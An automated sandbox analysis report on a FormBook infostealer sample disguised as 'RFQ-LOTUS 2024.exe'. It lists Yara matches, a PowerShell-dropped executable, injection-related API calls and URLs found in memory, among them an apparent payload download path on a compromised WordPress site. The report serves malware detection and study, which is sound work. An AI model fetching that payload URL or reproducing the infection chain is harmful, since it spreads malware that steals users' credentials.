Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeDate: Thu, 02 May 2024 13:09:58 GMTServer: ApacheX-Powered-By: PHP/8.2.18Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://wrgardenrooms.co.uk/wp-json/>; rel="https://api.w.org/"Content-Encoding: gzipData Raw: 34 35 35 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 7d 7b 93 db 36 b2 ef df 76 d5 fd 0e b0 5c eb 91 12 51 ef c7 8c c6 9a dd c4 8f c4 e7 24 71 ae 9d 9c d4 b9 b1 6b 8a 92 a8 91 6c 49 d4 92 d4 3c 32 3b df fd fe ba 01 90 20 09 49 9c 87 b3 bb a7 ce 24 9e 91 48 a0 bb d1 68 34 1a dd 0d e0 f9 93 97 6f 5f fc f2 df 3f bf 12 b3 68 b9 38 79 fc 9c fe 88 c9 3c 18 96 16 51 50 12 0b 77 75 36 2c 79 2b e7 bb 6f 4b 62 1d 78 d3 f9 e5 b0 e4 9f 0d 50 3c 5a 87 83 7a dd 3f 5b d7 96 5e 7d 15 3e 2d 51 6d cf 9d 9c 3c 7e f4 7c e9 45 ae 18 cf dc 20 f4 a2 61 e9 d7 5f 5e 3b 87 25 51 8f df ac dc a5 37 2c 9d cf bd 8b b5 1f 44 25 31 f6 57 91 b7 42 c9 8b f9 24 9a 0d 27 de f9 7c ec 39 fc a5 2a e6 ab 79 34 77 17 4e 38 76 17 de b0 29 e1 3c 7a f4 3c 8c ae 16 de c9 23 f5 f3 98 ff 4e fd 60 f9 34 8c e6 e3 cf 57 de c2 5b 02 66 e8 d0 33 00 59 6f a2 c1 c0 59 fa 7f 38 eb 85 3b f6 66 fe 62 e2 05 d7 b2 da a3 b1 bf f0 83 81 78 da 79 4d ff 1d cb a7 37 a2 28 d0 d0 61 f8 fb 21 33 91 85 e1 5e 78 a3 cf f3 e8 76 b0 8b 91 bc 97 05 92 d0 3d c0 22 ef 32 72 03 cf 1d 0c 0c 78 c2 ce d3 5b 02 cc 76 d4 5e a8 cf eb 4a 1e 88 66 fc 7b fe c4 71 c4 37 8b 05 7a 5e bc 5d 79 e2 fd ab b7 a2 53 eb d6 0e 85 23 dc b9 1f 7a 7e 6d ec 2f 85 e3 9c fc 1f 2a 1d cd 23 08 d3 f3 ba fc 4b 4f 58 84 a5 a0 06 fe c8 8f 42 43 4c 57 fe 7c 35 f1 2e 95 28 9a 45 cf bc 95 17 b8 91 8f a1 13 0b 75 86 8a f2 37 6f de 82 9a 8a 24 47 c3 08 c7 c1 7c 1d 89 e8 6a 8d 91 e1 ae d7 8b f9 d8 8d e6 fe aa be 98 7c fd 29 f4 57 80 b7 70 c3 10 ef 98 78 8c 86 99 b7 74 31 e6 d0 dc eb d2 df 18 d9 65 54 1a 94 e4 c0 fc 50 ff 50 97 45 6a 7e 70 56 aa 96 fe 76 16 b8 eb 59 69 f0 3b 0a 13 12 94 fc 16 5d 37 19 07 9b e5 e8 87 79 18 51 99 f9 44 01 18 50 fd 8b e0 cc 0d 26 de 2a f0 fd 65 08 6e d5 36 9f 3f d4 cf fe d8 34 9f 8e e2 9a 0b 59 73 1e 79 4b 02 f2 4a 0e ba 14 1a 7a fe 06 ef 0b 22 78 4a 20 55 f9 b5 1f 62 ec a3 f1 83 66 b5 44 7d 01 f2 be f7 f1 a7 5a 22 8c 7b 89 45 b9 15 64 94 a1 49 ce ec 69 58 8c fb a6 9a f0 e9 96 0d 60 0e c5 80 aa a5 a4 11 ad b8 11 3f f9 91 78 ed 6f 56 13 50 08 ad 7a 3e f7 37 61 21 2a 13 ee dc 7c 34 69 7c 8b be 5a cd ff 60 91 29 ca 68 08 86 59 47 f1 f7 b7 19 58 2b de 61 84 88 ef b8 fb f1 19 fd 0f a0 9b 60 51 84 e3 0b ff cc 2f 0d 12 f6 bd 59 ba 67 de db d1 27 6f 4c 32 56 04 c8 c5 da 51 83 e7 43 7d b3 5e f8 ee 24 fc 50 6f 35 5a 9d 0f f5 46 fb 43 fd bb a3 53 26 92 68 94 24 86 a7 3f bc fd ee ad d3 96 73 c4 a4 f6 69 cd 22 5f 50 9c 3f d4 9f 9a ac f8 81 e8 af ca a9 a8 34 68 75 7b 8d 6a 69 e6 cd cf 66 18 5d ad 56 e7 e8 06 c2 47 4d e2 36 16 40 91 07 0e 08 21 84 f9 9b 10 e3 c4 18 af 17 17 17 b5 29 a6 a6 91 ef 7f 26 e5 f4 a1 fe db bb ef be 79 f7 f2 d5 4f ef de be fd f1 fd 87 3a a8
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeDate: Thu, 02 May 2024 13:10:01 GMTServer: ApacheX-Powered-By: PHP/8.2.18Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://wrgardenrooms.co.uk/wp-json/>; rel="https://api.w.org/"Content-Encoding: gzipData Raw: 34 35 34 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 7d 7b 93 db 36 b2 ef df 76 d5 fd 0e b0 5c eb 91 12 51 ef c7 8c c6 9a dd c4 8f c4 e7 24 71 ae 9d 9c d4 b9 b1 6b 8a 92 a8 91 6c 49 d4 92 d4 3c 32 3b df fd fe ba 01 90 20 09 49 9c 87 b3 bb a7 ce 24 9e 91 48 a0 bb d1 68 34 1a dd 0d e0 f9 93 97 6f 5f fc f2 df 3f bf 12 b3 68 b9 38 79 fc 9c fe 88 c9 3c 18 96 16 51 50 12 0b 77 75 36 2c 79 2b e7 bb 6f 4b 62 1d 78 d3 f9 e5 b0 e4 9f 0d 50 3c 5a 87 83 7a dd 3f 5b d7 96 5e 7d 15 3e 2d 51 6d cf 9d 9c 3c 7e f4 7c e9 45 ae 18 cf dc 20 f4 a2 61 e9 d7 5f 5e 3b 87 25 51 8f df ac dc a5 37 2c 9d cf bd 8b b5 1f 44 25 31 f6 57 91 b7 42 c9 8b f9 24 9a 0d 27 de f9 7c ec 39 fc a5 2a e6 ab 79 34 77 17 4e 38 76 17 de b0 29 e1 3c 7a f4 3c 8c ae 16 de c9 23 f5 f3 98 ff 4e fd 60 f9 34 8c e6 e3 cf 57 de c2 5b 02 66 e8 d0 33 00 59 6f a2 c1 c0 59 fa 7f 38 eb 85 3b f6 66 fe 62 e2 05 d7 b2 da a3 b1 bf f0 83 81 78 da 79 4d ff 1d cb a7 37 a2 28 d0 d0 61 f8 fb 21 33 91 85 e1 5e 78 a3 cf f3 e8 76 b0 8b 91 bc 97 05 92 d0 3d c0 22 ef 32 72 03 cf 1d 0c 0c 78 c2 ce d3 5b 02 cc 76 d4 5e a8 cf eb 4a 1e 88 66 fc 7b fe c4 71 c4 37 8b 05 7a 5e bc 5d 79 e2 fd ab b7 a2 53 eb d6 0e 85 23 dc b9 1f 7a 7e 6d ec 2f 85 e3 9c fc 1f 2a 1d cd 23 08 d3 f3 ba fc 4b 4f 58 84 a5 a0 06 fe c8 8f 42 43 4c 57 fe 7c 35 f1 2e 95 28 9a 45 cf bc 95 17 b8 91 8f a1 13 0b 75 86 8a f2 37 6f de 82 9a 8a 24 47 c3 08 c7 c1 7c 1d 89 e8 6a 8d 91 e1 ae d7 8b f9 d8 8d e6 fe aa be 98 7c fd 29 f4 57 80 b7 70 c3 10 ef 98 78 8c 86 99 b7 74 31 e6 d0 dc eb d2 df 18 d9 65 54 1a 94 e4 c0 fc 50 ff 50 97 45 6a 7e 70 56 aa 96 fe 76 16 b8 eb 59 69 f0 3b 0a 13 12 94 fc 16 5d 37 19 07 9b e5 e8 87 79 18 51 99 f9 44 01 18 50 fd 8b e0 cc 0d 26 de 2a f0 fd 65 08 6e d5 36 9f 3f d4 cf fe d8 34 9f 8e e2 9a 0b 59 73 1e 79 4b 02 f2 4a 0e ba 14 1a 7a fe 06 ef 0b 22 78 4a 20 55 f9 b5 1f 62 ec a3 f1 83 66 b5 44 7d 01 f2 be f7 f1 a7 5a 22 8c 7b 89 45 b9 15 64 94 a1 49 ce ec 69 58 8c fb a6 9a f0 e9 96 0d 60 0e c5 80 aa a5 a4 11 ad b8 11 3f f9 91 78 ed 6f 56 13 50 08 ad 7a 3e f7 37 61 21 2a 13 ee dc 7c 34 69 7c 8b be 5a cd ff 60 91 29 ca 68 08 86 59 47 f1 f7 b7 19 58 2b de 61 84 88 ef b8 fb f1 19 fd 0f a0 9b 60 51 84 e3 0b ff cc 2f 0d 12 f6 bd 59 ba 67 de db d1 27 6f 4c 32 56 04 c8 c5 da 51 83 e7 43 7d b3 5e f8 ee 24 fc 50 6f 35 5a 9d 0f f5 46 fb 43 fd bb a3 53 26 92 68 94 24 86 a7 3f bc fd ee ad d3 96 73 c4 a4 f6 69 cd 22 5f 50 9c 3f d4 9f 9a ac f8 81 e8 af ca a9 a8 34 68 75 7b 8d 6a 69 e6 cd cf 66 18 5d ad 56 e7 e8 06 c2 47 4d e2 36 16 40 91 07 0e 08 21 84 f9 9b 10 e3 c4 18 af 17 17 17 b5 29 a6 a6 91 ef 7f 26 e5 f4 a1 fe db bb ef be 79 f7 f2 d5 4f ef de be fd f1 fd 87 3a a8

Source: svchost.exe, 00000005.00000002.4126707039.0000024951000000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: svchost.exe, 00000005.00000002.4127786165.00000249510E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/
Source: svchost.exe, 00000005.00000002.4127094977.0000024951062000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYTBmQUFZUHRkSkgtb01u
Source: svchost.exe, 00000005.00000003.1691443532.0000024951218000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: svchost.exe, 00000005.00000003.1691443532.0000024951218000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
Source: svchost.exe, 00000005.00000003.1691443532.0000024951218000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: svchost.exe, 00000005.00000003.1691443532.0000024951218000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: svchost.exe, 00000005.00000003.1691443532.0000024951218000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 00000005.00000003.1691443532.0000024951218000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 00000005.00000003.1691443532.000002495124D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: svchost.exe, 00000005.00000002.4127094977.0000024951097000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com:80
Source: svchost.exe, 00000005.00000002.4127094977.0000024951097000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com:80/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYTBmQUFZUHRkSkgtb
Source: svchost.exe, 00000005.00000003.1691443532.0000024951291000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: RFQ-LOTUS 2024.exe, 00000000.00000000.1625842032.000000000040A000.00000008.00000001.01000000.00000003.sdmp, RFQ-LOTUS 2024.exe, 00000000.00000002.1722473207.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Minken.exe, 0000000C.00000000.2415788858.000000000040A000.00000008.00000001.01000000.00000009.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000001.00000002.2582911000.0000000006349000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000001.00000002.2580705350.0000000005436000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.2580705350.00000000052E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.2580705350.0000000005436000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Minken.exe, 0000000C.00000001.2418106236.0000000000649000.00000020.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://www.ftp.ftp://ftp.gopher.
Source: Minken.exe, 0000000C.00000001.2418106236.00000000005F2000.00000020.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
Source: Minken.exe, 0000000C.00000001.2418106236.00000000005F2000.00000020.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
Source: powershell.exe, 00000001.00000002.2580705350.00000000052E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000001.00000002.2582911000.0000000006349000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.2582911000.0000000006349000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.2582911000.0000000006349000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: svchost.exe, 00000005.00000003.1691443532.00000249512C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: svchost.exe, 00000005.00000003.1691443532.0000024951272000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: svchost.exe, 00000005.00000003.1691443532.00000249512C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: svchost.exe, 00000005.00000003.1691443532.00000249512A3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1691443532.0000024951307000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1691443532.00000249512C2000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1691443532.00000249512E8000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1691443532.00000249512F4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 00000005.00000003.1691443532.00000249512C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
Source: powershell.exe, 00000001.00000002.2580705350.0000000005436000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: Minken.exe, 0000000C.00000001.2418106236.0000000000649000.00000020.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
Source: powershell.exe, 00000001.00000002.2582911000.0000000006349000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: svchost.exe, 00000005.00000003.1691443532.00000249512C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: svchost.exe, 00000005.00000003.1691443532.0000024951272000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
Source: Minken.exe, 0000000C.00000002.2923752345.00000000070A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://thequirkyartman.co.uk/1
Source: Minken.exe, 0000000C.00000002.2923752345.00000000070A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://thequirkyartman.co.uk/A
Source: Minken.exe, 0000000C.00000002.2923752345.0000000007085000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://thequirkyartman.co.uk/wp-includes/pLykMdE/ZIbbdBq101.bin
Source: Minken.exe, 0000000C.00000002.2923752345.0000000007085000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://thequirkyartman.co.uk/wp-includes/pLykMdE/ZIbbdBq101.binP

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.4:49752 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.31.110:443 -> 192.168.2.4:49755 version: TLS 1.2

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 00000012.00000002.4124828418.00000000007C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.4125392542.0000000004BE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.4124789568.0000000002160000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.4124881120.0000000000800000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2939523462.0000000022E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.4123618646.0000000000110000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000012.00000002.4124828418.00000000007C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000011.00000002.4125392542.0000000004BE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000011.00000002.4124789568.0000000002160000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000012.00000002.4124881120.0000000000800000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000C.00000002.2939523462.0000000022E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000012.00000002.4123618646.0000000000110000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: RFQ-LOTUS 2024.exe

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\Minken.exe

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231935C0 NtCreateMutant,LdrInitializeThunk,	12_2_231935C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23192DF0 NtQuerySystemInformation,LdrInitializeThunk,	12_2_23192DF0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23192C70 NtFreeVirtualMemory,LdrInitializeThunk,	12_2_23192C70
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23194340 NtSetContextThread,	12_2_23194340
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23193010 NtOpenDirectoryObject,	12_2_23193010
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23193090 NtSetValueKey,	12_2_23193090
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23194650 NtSuspendThread,	12_2_23194650
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23192B60 NtClose,	12_2_23192B60
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CA4340 NtSetContextThread,LdrInitializeThunk,	18_2_02CA4340
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CA4650 NtSuspendThread,LdrInitializeThunk,	18_2_02CA4650
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CA35C0 NtCreateMutant,LdrInitializeThunk,	18_2_02CA35C0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CA2AD0 NtReadFile,LdrInitializeThunk,	18_2_02CA2AD0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CA2AF0 NtWriteFile,LdrInitializeThunk,	18_2_02CA2AF0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CA2BE0 NtQueryValueKey,LdrInitializeThunk,	18_2_02CA2BE0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CA2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	18_2_02CA2BF0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CA2BA0 NtEnumerateValueKey,LdrInitializeThunk,	18_2_02CA2BA0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CA2B60 NtClose,LdrInitializeThunk,	18_2_02CA2B60
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CA39B0 NtGetContextThread,LdrInitializeThunk,	18_2_02CA39B0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CA2EE0 NtQueueApcThread,LdrInitializeThunk,	18_2_02CA2EE0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CA2E80 NtReadVirtualMemory,LdrInitializeThunk,	18_2_02CA2E80
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CA2FE0 NtCreateFile,LdrInitializeThunk,	18_2_02CA2FE0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CA2FB0 NtResumeThread,LdrInitializeThunk,	18_2_02CA2FB0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CA2F30 NtCreateSection,LdrInitializeThunk,	18_2_02CA2F30
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CA2CA0 NtQueryInformationToken,LdrInitializeThunk,	18_2_02CA2CA0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CA2C60 NtCreateKey,LdrInitializeThunk,	18_2_02CA2C60
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CA2C70 NtFreeVirtualMemory,LdrInitializeThunk,	18_2_02CA2C70
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CA2DD0 NtDelayExecution,LdrInitializeThunk,	18_2_02CA2DD0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CA2DF0 NtQuerySystemInformation,LdrInitializeThunk,	18_2_02CA2DF0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CA2D10 NtMapViewOfSection,LdrInitializeThunk,	18_2_02CA2D10
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CA2D30 NtUnmapViewOfSection,LdrInitializeThunk,	18_2_02CA2D30
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CA3090 NtSetValueKey,	18_2_02CA3090
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CA3010 NtOpenDirectoryObject,	18_2_02CA3010
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CA2AB0 NtWaitForSingleObject,	18_2_02CA2AB0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CA2B80 NtQueryInformationFile,	18_2_02CA2B80
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CA2EA0 NtAdjustPrivilegesToken,	18_2_02CA2EA0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CA2E30 NtWriteVirtualMemory,	18_2_02CA2E30
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CA2F90 NtProtectVirtualMemory,	18_2_02CA2F90
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CA2FA0 NtQuerySection,	18_2_02CA2FA0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CA2F60 NtCreateProcessEx,	18_2_02CA2F60
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CA2CC0 NtQueryVirtualMemory,	18_2_02CA2CC0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CA2CF0 NtOpenProcess,	18_2_02CA2CF0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CA2C00 NtQueryInformationProcess,	18_2_02CA2C00
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CA2DB0 NtEnumerateKey,	18_2_02CA2DB0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CA3D70 NtOpenThread,	18_2_02CA3D70
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CA2D00 NtSetInformationFile,	18_2_02CA2D00
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CA3D10 NtOpenProcessToken,	18_2_02CA3D10
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_00137480 NtCreateFile,	18_2_00137480
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_001375E0 NtReadFile,	18_2_001375E0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_001376D0 NtDeleteFile,	18_2_001376D0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_00137760 NtClose,	18_2_00137760
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_001378C0 NtAllocateVirtualMemory,	18_2_001378C0

Source: C:\Users\user\Desktop\RFQ-LOTUS 2024.exe

Code function: 0_2_0040327D EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_0040327D

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_04DDEFF8	1_2_04DDEFF8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_04DDECB0	1_2_04DDECB0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_089A0040	1_2_089A0040
